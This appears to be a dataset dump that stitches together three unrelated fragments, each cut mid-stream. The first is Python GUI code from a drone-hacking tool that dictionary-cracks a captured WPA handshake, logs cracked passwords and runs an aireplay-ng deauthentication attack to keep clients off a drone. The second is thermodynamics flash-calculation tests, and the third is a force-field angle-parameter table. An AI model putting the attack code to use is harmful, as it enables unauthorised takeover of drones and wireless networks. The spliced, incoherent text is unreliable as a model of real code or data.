input
stringlengths
2.65k
237k
output
stringclasses
1 value
= "right") except: #If icon not found self.step3_label.config(text = "Cracking password locally   ☐") self.info_label.config(text = "Cracking password locally.") check_wifi_connect_states = "nmcli d show " + selected_interface + " 2>&1 | grep 'GENERAL.STATE:' | awk '{print $3}'" get_wifi_connect_states = subprocess.Popen(check_wifi_connect_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get Wi-Fi connection state wifi_connect_states = get_wifi_connect_states.read().splitlines() wifi_connect_state_convert = str(wifi_connect_states) #Convert to string wifi_connect_states_strip = wifi_connect_state_convert.strip("[]") #Remove characters "[]" wifi_connect_states_strip_bracket = eval(wifi_connect_states_strip) #Remove characters "''" return_wifi_connect_states = wifi_connect_states_strip_bracket.strip("()") #Remove characters "()" disconect_wifi = "nmcli dev disconnect " + selected_interface if return_wifi_connect_states == "connected": #If Wi-Fi connected disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() elif return_wifi_connect_states == "connecting": #If connecting a Wi-Fi network disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() password_dictionary_path = current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_lite_dictionary" + ".txt" changed_password_generator_lite.passwordInsert(cracked_password_output, password_dictionary_path) changed_password_generator_lite.oneChange(cracked_password_output, password_dictionary_path) local_cracking_password_states = "<PASSWORD> " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.cap -w " + current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_lite_dictionary" + ".txt 2>&1 | grep 'KEY FOUND!' 
| awk '{print $4}'" #print(local_cracking_password_states) get_local_cracking_password_states = subprocess.Popen(local_cracking_password_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get local password cracking state local_cracking_password_states = get_local_cracking_password_states.read().splitlines() local_cracked_password = local_cracking_password_states[:1] local_cracked_password_convert = str(local_cracked_password) #Convert to string #print(local_cracked_password_convert) try: local_cracked_password_strip = local_cracked_password_convert.strip("[]") #Remove characters "[]" local_cracked_password = eval(local_cracked_password_strip) #Remove characters "''" success_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [selected_bssid] channel_log = [selected_channel] privacy_log = [selected_privacy] password_log = [local_cracked_password] manufacturer_log = [matched_manufacturer] client_BSSID_log = [selected_ap_client] remote_server_timestamp_log = [success_timestamp] states_log = ["BSSID: " + selected_bssid + " password cracked. 
The password is: " + local_cracked_password] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":password_log, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv" self.check_cracked_password_list_file = Path(current_path + "/data/cracked_password_list.csv") if self.check_cracked_password_list_file.is_file(): #Check "cracked_password_list.csv" is really exist cracked_BSSID_log = [selected_bssid] password_log = [local_cracked_password] remote_server_timestamp_log = [success_timestamp] dataframe = pd.DataFrame({"cracked_BSSID":cracked_BSSID_log, "password":<PASSWORD>, "timestamp":remote_server_timestamp_log}) dataframe.to_csv(current_path + "/data/cracked_password_list.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "cracked_password_list.csv" try: self.step3_label.config(text = "Cracking password locally   ", image = self.label_finish_icon, compound = "right") except: #If icon not found self.step3_label.config(text = "Cracking password locally   ☑") self.info_label.config(text = "Password cracked.") cracked_password_message = "The password is: " + <PASSWORD> + "\n\nWould you like to connect with your previously selected target?" 
if messagebox.askokcancel("Successfully Cracked", cracked_password_message): self.load_attack() app.after(2000, self.check_askstring) except SyntaxError: #If not password matched failed_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [selected_bssid] channel_log = [selected_channel] privacy_log = [selected_privacy] password_log = [""] manufacturer_log = [matched_manufacturer] client_BSSID_log = [selected_ap_client] remote_server_timestamp_log = [failed_timestamp] states_log = ["BSSID: " + selected_bssid + " password cannot be cracked by lite dictionary."] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv" try: self.step3_label.config(text = "Cracking password locally   ", image = self.label_fail_icon, compound = "right") except: #If icon not found self.step3_label.config(text = "Cracking password locally   ☒") self.info_label.config(text = "Failed to crack the password locally.") get_messagebox_states = messagebox.askyesnocancel("Error", "Failed to crack the password locally.\n\nWould you like to connect to the remote server for cracking the password, or press 'No' for try to enter the password again?") if get_messagebox_states == True: self.destroy_wifi_attack_gui() self.controller.show_frame("RemoteServerConnect") elif get_messagebox_states == False: self.load_attack() app.after(2000, self.check_askstring) elif get_messagebox_states == None: handshake_message = "4 way handshake file save at: " + current_path + "/handshake, 
the name is:\n" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.\n\nWould you like to keep running deauthentication attack to prevent the client reconnect to the drone?" if messagebox.askyesno("Request Processed", handshake_message): deauth_info = "echo " + sudo_password + " | sudo -S xterm -iconic -T 'deauthinfo' -hold -e 'aireplay-ng --deauth 0 -a " + selected_bssid + " -c " + selected_ap_client + " " + selected_interface + "'" subprocess.Popen(deauth_info, stdout = subprocess.PIPE, shell = True) if messagebox.showinfo("Wi-Fi Deauthentication", "Please press 'OK' to stop Wi-Fi Deauthentication attack."): find_xterm_aireplay_pid = "ps ax | grep 'xterm -iconic -T deauthinfo -hold -e aireplay-ng --deauth 0 -a " + selected_bssid + " -c " + selected_ap_client + " " + selected_interface + "'" + " | grep -v grep | grep -v sudo | awk '{print $1}'" get_xterm_aireplay_pid = subprocess.Popen(find_xterm_aireplay_pid, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout xterm_aireplay_pid = get_xterm_aireplay_pid.read().splitlines() xterm_aireplay_pid_convert = str(xterm_aireplay_pid) #Convert to string xterm_aireplay_pid_strip = xterm_aireplay_pid_convert.strip("[]") #Remove characters "[]" return_xterm_aireplay_pid = eval(xterm_aireplay_pid_strip) #Remove characters "''" colse_xterm_aireplay = "echo " + sudo_password + " | sudo -S kill " + return_xterm_aireplay_pid close_xterm_aireplay_terminal = subprocess.Popen(colse_xterm_aireplay, stdout = subprocess.PIPE, shell = True) #For close the xterm aireplay terminal close_xterm_aireplay_terminal.wait() time.sleep(0.3) self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: if messagebox.showinfo("Request Processed", handshake_message): self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: if messagebox.askyesno("Request Processed", "The 4-way handshake file is collected, 
would you like to connect to the remote server for cracking the password?"): check_wifi_connect_states = "nmcli d show " + selected_interface + " 2>&1 | grep 'GENERAL.STATE:' | awk '{print $3}'" get_wifi_connect_states = subprocess.Popen(check_wifi_connect_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get Wi-Fi connection state wifi_connect_states = get_wifi_connect_states.read().splitlines() wifi_connect_state_convert = str(wifi_connect_states) #Convert to string wifi_connect_states_strip = wifi_connect_state_convert.strip("[]") #Remove characters "[]" wifi_connect_states_strip_bracket = eval(wifi_connect_states_strip) #Remove characters "''" return_wifi_connect_states = wifi_connect_states_strip_bracket.strip("()") #Remove characters "()" disconect_wifi = "nmcli dev disconnect " + selected_interface if return_wifi_connect_states == "connected": #If Wi-Fi connected disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() elif return_wifi_connect_states == "connecting": #If connecting a Wi-Fi network disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() self.destroy_wifi_attack_gui() self.controller.show_frame("RemoteServerConnect") else: if messagebox.showinfo("Request Processed", handshake_message): self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") except NameError: if messagebox.askyesno("Request Processed", "The 4-way handshake file is collected, would you like to connect to the remote server for cracking the password?"): check_wifi_connect_states = "nmcli d show " + selected_interface + " 2>&1 | grep 'GENERAL.STATE:' | awk '{print $3}'" get_wifi_connect_states = subprocess.Popen(check_wifi_connect_states, stdout = subprocess.PIPE, shell = True, universal_newlines = True).stdout #Get Wi-Fi connection state wifi_connect_states = get_wifi_connect_states.read().splitlines() 
wifi_connect_state_convert = str(wifi_connect_states) #Convert to string wifi_connect_states_strip = wifi_connect_state_convert.strip("[]") #Remove characters "[]" wifi_connect_states_strip_bracket = eval(wifi_connect_states_strip) #Remove characters "''" return_wifi_connect_states = wifi_connect_states_strip_bracket.strip("()") #Remove characters "()" disconect_wifi = "nmcli dev disconnect " + selected_interface if return_wifi_connect_states == "connected": #If Wi-Fi connected disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() elif return_wifi_connect_states == "connecting": #If connecting a Wi-Fi network disconnect_wifi = subprocess.Popen(disconect_wifi, stdout = subprocess.PIPE, shell = True) disconnect_wifi.wait() self.destroy_wifi_attack_gui() self.controller.show_frame("RemoteServerConnect") else: if messagebox.showinfo("Request Processed", handshake_message): self.destroy_wifi_attack_gui() self.controller.show_frame("StartPage") else: self.check_four_way_handshake_cap_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.cap") if self.check_four_way_handshake_cap_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.cap" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.cap", stdout = subprocess.PIPE, shell = True) self.check_four_way_handshake_csv_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.csv") if self.check_four_way_handshake_csv_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.csv" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.csv", stdout = subprocess.PIPE, shell = True) 
self.check_four_way_handshake_kismet_csv_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.csv") if self.check_four_way_handshake_kismet_csv_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.kismet.csv" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.csv", stdout = subprocess.PIPE, shell = True) self.check_four_way_handshake_kismet_netxml_file = Path(current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.netxml") if self.check_four_way_handshake_kismet_netxml_file.is_file(): #Check "00:00:00:00:00:00_00000000-000000-01.kismet.netxml" is really exist subprocess.Popen("echo " + sudo_password + " | sudo -S rm " + current_path + "/handshake/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "-01.kismet.netxml", stdout = subprocess.PIPE, shell = True) self.check_four_way_handshake_log_csv_file = Path(current_path + "/handshake/"
and the required # input form. taus = [ [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]], [[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]] ] alphas = [[[0.0, 0.0], [0.0, 0.0]], [[0.3, 0], [0.0, 0.0]] ] pp = Nrtl(tau_coeffs=taus, alpha_coeffs=alphas, VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations) assert_allclose(pp.gammas(T=m.T, xs=m.zs), [1.1114056946393671, 2.5391220022675163], rtol=1e-6) assert_allclose(pp.alphas(m.T), [[0.0, 0.0], [0.3, 0.0]]) assert_allclose(pp.taus(m.T), [[0.0, 1.7500005828354948], [-0.08352950604691833, 0.0]]) pp.flash(T=m.T, VF=0, zs=m.zs) assert_allclose(pp.P, 72190.62175687613, rtol=2e-3) pp.flash(T=m.T, VF=1, zs=m.zs) assert_allclose(pp.P, 40485.10473289466, rtol=2e-3) @pytest.mark.deprecated def test_NRTL_package_constants(): taus = [ [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]], [[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]] ] alphas = [[[0.0, 0.0], [0.0, 0.0]], [[0.3, 0], [0.0, 0.0]] ] IDs = ['water', 'ethanol'] # tau_coeffs, alpha_coeffs zs = [1-.252, .252] pkg = PropertyPackageConstants(IDs, name=NRTL_PKG, tau_coeffs=taus, alpha_coeffs=alphas) pkg.pkg.flash(zs=zs, T=300, VF=0.5) pkg.pkg.phase, pkg.pkg.P assert_allclose(pkg.pkg.P, 5763.42373196148, atol=20, rtol=1e-4) @pytest.mark.deprecated def test_Unifac_EOS_POY(): m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15) pkg = Unifac(UNIFAC_groups=m.UNIFAC_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX) pkg.use_phis, pkg.use_Poynting = True, True pkg.flash(zs=m.zs, T=400, VF=0.5) xs_expect = [0.04428613261665119, 0.28125472768746834, 0.6744591396958806] ys_expect = [0.15571386738334897, 0.518745272312532, 
0.32554086030411905] assert pkg.phase == 'l/g' assert_allclose(pkg.xs, xs_expect, rtol=1e-3) assert_allclose(pkg.ys, ys_expect, rtol=1e-3) assert_allclose(pkg.P, 230201.5387679756, rtol=1e-3) @pytest.mark.fuzz @pytest.mark.slow @pytest.mark.deprecated def test_Unifac_fuzz(): m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15) vodka = Unifac(m.UNIFAC_groups, m.VaporPressures, m.Tms, m.Tcs, m.Pcs) for i in range(500): zs = [uniform(0, 1) for i in range(2)] zs = [i/sum(zs) for i in zs] T_known = uniform(274, 513) V_over_F_known = uniform(0, 1) vodka.flash(T=T_known, VF=V_over_F_known, zs=zs) P_known = vodka.P xs_known = vodka.xs ys_known = vodka.ys phase_known = vodka.phase # test TP flash gives the same as TVF vodka.flash(T=T_known, P=P_known, zs=zs) assert_allclose(V_over_F_known, vodka.V_over_F, rtol=1E-5) assert_allclose(xs_known, vodka.xs, rtol=1E-5) assert_allclose(ys_known, vodka.ys, rtol=1E-5) assert vodka.phase == phase_known # Test PVF flash gives same as well vodka.flash(VF=V_over_F_known, P=P_known, zs=zs) assert_allclose(xs_known, vodka.xs) assert_allclose(ys_known, vodka.ys) assert_allclose(xs_known, vodka.xs) assert_allclose(T_known, vodka.T) assert vodka.phase == phase_known @pytest.mark.slow @pytest.mark.deprecated def test_UnifacDortmund(): m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=6500, T=298.15) vodka = UnifacDortmund(UNIFAC_groups=m.UNIFAC_Dortmund_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs) # Low pressure ethanol-water ideal TP flash phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs) V_over_F_expect = 0.721802969194136 xs_expect = [0.26331608196660095, 0.736683918033399] ys_expect = [0.5912226272910779, 0.408777372708922] assert phase == 'l/g' assert_allclose(xs, xs_expect) assert_allclose(ys, ys_expect) assert_allclose(V_over_F, V_over_F_expect) # Same flash with T-VF spec phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs) assert phase == 'l/g' 
assert_allclose(xs, xs_expect, rtol=1E-5) assert_allclose(ys, ys_expect, rtol=1E-5) assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5) # Same flash with P-VF spec phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs) assert phase == 'l/g' assert_allclose(xs, xs_expect, rtol=1E-5) assert_allclose(ys, ys_expect, rtol=1E-5) assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5) # Test the flash interface directly T_known = m.T V_over_F_known = V_over_F_expect zs = m.zs vodka.flash(T=T_known, VF=V_over_F_known, zs=zs) P_known = vodka.P xs_known = vodka.xs ys_known = vodka.ys phase_known = vodka.phase # test TP flash gives the same as TVF vodka.flash(T=T_known, P=P_known, zs=zs) assert_allclose(V_over_F_known, vodka.V_over_F) assert_allclose(xs_known, vodka.xs) assert_allclose(ys_known, vodka.ys) assert vodka.phase == phase_known # Test PVF flash gives same as well vodka.flash(VF=V_over_F_known, P=P_known, zs=zs) assert_allclose(xs_known, vodka.xs) assert_allclose(ys_known, vodka.ys) assert_allclose(xs_known, vodka.xs) assert_allclose(T_known, vodka.T) assert vodka.phase == phase_known @pytest.mark.deprecated def test_plotting_failures(): m = Mixture(['ethanol', 'methanol', 'water'], zs=[0.3, 0.3, 0.4], P=5000, T=298.15) ternary = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs) with pytest.raises(Exception): ternary.plot_Pxy(300) with pytest.raises(Exception): ternary.plot_Txy(300) with pytest.raises(Exception): ternary.plot_xy(300) @pytest.mark.deprecated def test_IdealCaloric_single_component_H(): w = Chemical('water') EnthalpyVaporization = w.EnthalpyVaporization HeatCapacityGas = w.HeatCapacityGas VaporPressure = w.VaporPressure m = Mixture(['water'], zs=[1], T=298.15) pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids) pkg.P_DEPENDENT_H_LIQ = 
False # Check the enthalpy of vaporization matches at the reference temperature pkg.flash(T=298.15, P=1E5, zs=m.zs) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, -EnthalpyVaporization(298.15)) # Check it's pressure independent for the gas (at ref T) kw_options = [{'P': w.Psat}, {'P': 100}, {'P': 1E-10}, {'VF': 1}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, 0) # Check it's pressure is independent (so long as it stays liquid) kw_options = [{'P': w.Psat+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, -EnthalpyVaporization(298.15)) # Gas heat capacity along the vapor curve (and above it) for T in np.linspace(w.Tm, w.Tc-1): for kw in [{'VF': 1}, {'P': VaporPressure(T)*0.5}]: pkg.flash(T=T, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, HeatCapacityGas.T_dependent_property_integral(298.15, T)) # Gas heat capacity plus enthalpy of vaporization along the liquid for T in np.linspace(w.Tm, w.Tc-1): for kw in [{'VF': 0}, {'P': VaporPressure(T)*1.1}]: pkg.flash(T=T, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() H_recalc = (HeatCapacityGas.T_dependent_property_integral(298.15, T) -EnthalpyVaporization(T)) assert_allclose(H_pp, H_recalc) # Just one basic case at VF = 0.5 T = 298.15 pkg.flash(T=T, zs=m.zs, VF=0.5) assert_allclose(pkg.enthalpy_Cpg_Hvap(), -0.5*EnthalpyVaporization(T)) # For a variety of vapor fractions and temperatures, check the enthapy is correctly described for VF in np.linspace(0., 1, 20): for T in np.linspace(w.Tm, w.Tc, 5): pkg.flash(T=T, zs=m.zs, VF=VF) pkg_calc = pkg.enthalpy_Cpg_Hvap() hand_calc = -(1 - VF)*EnthalpyVaporization(T) + HeatCapacityGas.T_dependent_property_integral(298.15, T) assert_allclose(pkg_calc, hand_calc) # Check the liquid and vapor enthalpies are equal at the critical point T = w.Tc pkg.flash(T=w.Tc, zs=m.zs, VF=1) Hvap_Tc_1 = 
pkg.enthalpy_Cpg_Hvap() pkg.flash(T=w.Tc, zs=m.zs, VF=0) Hvap_Tc_0 = pkg.enthalpy_Cpg_Hvap() assert_allclose(Hvap_Tc_0, Hvap_Tc_1) pkg.flash(T=w.Tc, zs=m.zs, VF=0.5) Hvap_Tc_half = pkg.enthalpy_Cpg_Hvap() assert_allclose(Hvap_Tc_0, Hvap_Tc_half) @pytest.mark.deprecated def test_IdealCaloric_binary_H(): m = Mixture(['water', 'ethanol'], zs=[0.3, 0.7], T=298.15) pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids) pkg.P_DEPENDENT_H_LIQ = False # Check the enthalpy of vaporization matches at the reference temperature (as a liquid) pkg.flash(T=298.15, P=1E5, zs=m.zs) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, (-0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15))) # Check the enthalpy of 0 matches at the reference temperature (as a gas) pkg.flash(T=298.15, VF=1, zs=m.zs) assert_allclose(0, pkg.enthalpy_Cpg_Hvap(), atol=1E-9) # Check the gas, at various pressure but still Tref, has enthalpy of 0 pkg.flash(T=298.15, zs=m.zs, VF=1) P_dew = pkg.P kw_options = [{'P': P_dew}, {'P': 100}, {'P': 1E-10}, {'VF': 1}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() assert_allclose(H_pp, 0, atol=1E-7) # Check it's pressure is independent (so long as it stays liquid), has enthalpy of 0 pkg.flash(T=298.15, zs=m.zs, VF=0) P_bubble = pkg.P kw_options = [{'P': P_bubble+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}] for kw in kw_options: pkg.flash(T=298.15, zs=m.zs, **kw) H_pp = pkg.enthalpy_Cpg_Hvap() H_handcalc = -0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15) assert_allclose(H_pp, H_handcalc) # For a variety of vapor fractions and temperatures, check the enthapy is correctly described for VF in np.linspace(0., 1, 6): for T in np.linspace(280, 400, 8): z1 = uniform(0, 1) z2 = 1-z1 zs 
= [z1, z2] pkg.flash(T=T, zs=zs, VF=VF) pkg_calc = pkg.enthalpy_Cpg_Hvap() # bad hack as the behavior changed after if pkg.xs == None: pkg.xs = pkg.zs hand_calc =(-(1 - VF)*(pkg.xs[0]*m.EnthalpyVaporizations[0](T) + pkg.xs[1]*m.EnthalpyVaporizations[1](T)) + (z1*m.HeatCapacityGases[0].T_dependent_property_integral(298.15, T) + z2*m.HeatCapacityGases[1].T_dependent_property_integral(298.15, T))) assert_allclose(pkg_calc, hand_calc) @pytest.mark.deprecated def test_IdealCaloric_nitrogen_S(): m = Mixture(['nitrogen'], zs=[1], T=298.15) pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs, HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases, EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids) # Check the enthalpy of vaporization matches at the reference temperature for a gas pkg.flash(T=298.15, P=101325, zs=m.zs) S_pp = pkg.entropy_Cpg_Hvap() assert_allclose(S_pp, 0, atol=1E-9) # Check a entropy difference vs coolprop (N2)- 1.5% error pkg.flash(T=298.15, P=101325, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(T=298.15, P=2000325, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() assert_allclose(S2-S1, -25.16418, rtol=0.015) # # Check a entropy difference vs coolprop (N2)- 0.3% error pkg.flash(T=298.15, P=101325, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(T=298.15, P=102325, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() # 0.3% error with 1 kPa difference assert_allclose(S2-S1, -0.08184949145277187, rtol=0.003) # PropsSI('SMOLAR', 'T', 298.15, 'P', 102325, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2') # S2-S1 # <2.5% error on a 10 MPa/500K N2 vs 298.15 and 1 atm vs coolprop pkg.flash(T=298.15, P=101325, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(T=500, P=1E7, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() assert_allclose(S2-S1, -23.549468174122012, rtol=0.026) # PropsSI('SMOLAR', 'T', 500, 'P', 1E7, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2') # Entropy change of 
condensation at the saturation point of 1 bar - very low error pkg.flash(VF=1, P=1E5, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(VF=0, P=1E5, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() # T_change = PropsSI('T', 'Q', 0, 'P', 1E5, 'N2') # 77.24349973069587 # dS = PropsSI('SMOLAR', 'Q', 0, 'T', T_change, 'N2') - PropsSI('SMOLAR', 'Q', 1, 'T', T_change, 'N2') assert_allclose(S2 - S1, -72.28618677058911, rtol=5E-4) # Same test as before, 50% condensed pkg.flash(VF=1, P=1E5, zs=m.zs) S1 = pkg.entropy_Cpg_Hvap() pkg.flash(VF=0.5, P=1E5, zs=m.zs) S2 = pkg.entropy_Cpg_Hvap() assert_allclose(S2 - S1, -72.28618677058911/2, rtol=5E-4) # Test compressing a liquid doesn't add
108.60 5/2017 1 cu-cx-cu 100.4 50.91 5/2017 2 0.0020 cu-cx-cx 92.5 58.44 5/2017 28 0.4472 cu-cx-hc 46.9 118.69 5/2017 29 0.5914 cx-cx-cx 90.2 60.00 5/2017 1689 0.8111 cx-cx-cy 62.1 125.01 5/2017 7 2.6658 cx-cx-f 85.1 118.81 5/2017 17 1.2118 cx-cx-h1 45.9 118.69 5/2017 1339 1.3738 cx-cx-hc 46.1 117.69 5/2017 3482 0.9446 cx-cx-hx 45.7 119.61 5/2017 20 0.1625 cx-cx-n3 82.1 118.31 5/2017 44 1.4967 cx-cx-na 79.1 126.07 5/2017 53 1.5534 cx-cx-nh 82.3 118.36 5/2017 30 1.0567 cx-cx-os 83.5 117.05 5/2017 24 1.7797 cy-cx-hc 46.5 112.55 5/2017 1 f -cx-f 119.3 109.55 5/2017 2 f -cx-h1 65.5 111.68 SOURCE3 1 f -cx-hc 65.3 112.30 SOURCE2 1 h1-cx-h1 37.9 115.46 5/2017 355 0.3352 h1-cx-n3 61.0 113.39 5/2017 12 1.7033 h1-cx-n 61.1 114.26 5/2017 9 0.9343 h1-cx-na 61.8 108.27 5/2017 27 1.0053 h1-cx-nh 60.9 115.14 5/2017 13 0.0780 h1-cx-os 62.1 114.46 5/2017 3 0.8753 h2-cx-h2 37.9 115.54 5/2017 1 h2-cx-n2 58.7 117.18 SOURCE3 4 hc-cx-hc 38.1 114.43 5/2017 576 0.4881 hc-cx-os 61.1 114.10 SOURCE2 1 hx-cx-n4 59.7 110.22 5/2017 1 n2-cx-n2 162.4 49.07 5/2017 1 n -cx-oh 108.9 114.81 5/2017 1 n -cx-os 141.3 65.98 SOURCE3 1 oh-cx-oh 116.9 107.85 SOURCE3 1 oh-cx-os 108.5 118.12 SOURCE3 4 1.3581 os-cx-os 106.7 116.05 SOURCE4_SOURCE5 15 2.1532 c2-cy-cy 64.0 115.00 5/2017 33 3.1772 c3-cy-c3 65.1 111.38 5/2017 38 1.0405 c3-cy-cy 62.8 117.77 5/2017 593 2.7140 c3-cy-h1 46.5 111.78 5/2017 190 0.4589 c3-cy-hc 46.9 110.12 5/2017 286 0.5586 c3-cy-n3 83.9 110.25 5/2017 3 0.3967 c3-cy-n 84.2 111.04 5/2017 1 c3-cy-os 84.8 110.09 5/2017 2 0.2833 c -cy-c3 63.2 116.70 5/2017 203 0.5967 cc-cy-cy 62.5 121.63 5/2017 9 0.2884 c -cy-cy 73.4 85.16 5/2017 409 1.0345 cd-cy-cy 62.5 121.06 5/2017 18 0.5909 ce-cy-h2 45.8 117.52 5/2017 21 0.5798 ce-cy-n 94.2 87.94 SOURCE4_SOURCE5 38 0.1933 ce-cy-ss 60.4 120.60 5/2017 19 1.1851 c -cy-h1 45.8 112.97 5/2017 96 0.8493 c -cy-hc 46.1 111.24 5/2017 238 1.1926 cl-cy-cy 69.4 117.25 5/2017 41 1.1740 cl-cy-h1 49.1 107.03 5/2017 2 1.3003 cl-cy-hc 47.6 114.00 SOURCE2 1 c -cy-n 81.3 
